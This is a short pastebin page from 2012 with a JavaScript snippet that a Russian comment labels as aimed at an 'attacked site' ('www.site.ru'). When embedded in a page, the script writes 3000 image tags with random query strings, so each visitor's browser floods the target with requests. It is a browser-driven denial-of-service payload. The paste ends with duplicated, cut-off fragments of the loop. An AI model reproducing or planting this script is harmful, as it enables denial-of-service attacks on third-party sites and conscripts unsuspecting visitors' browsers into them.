Don't like ads? PRO users don't see any ads ;-)
Guest

Global

By: a guest on Jun 16th, 2012  |  syntax: JavaScript  |  size: 0.33 KB  |  hits: 18  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
This paste has a previous version, view the difference. Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. <script type="text/javascript">
  2. attack_host="www.site.ru" //адрес атакуемого сайта
  3. attack_port=80
  4. path='Shared/Compatibility.aspx'
  5. for(i=1;i<=3000;i++)
  6. { document.write('<img src="http://' + attack_host + ':' + attack_port + '/' + path + '?' +  Math.random() + '">');}
  7. </script>=3000;i++)
  8. { document.write('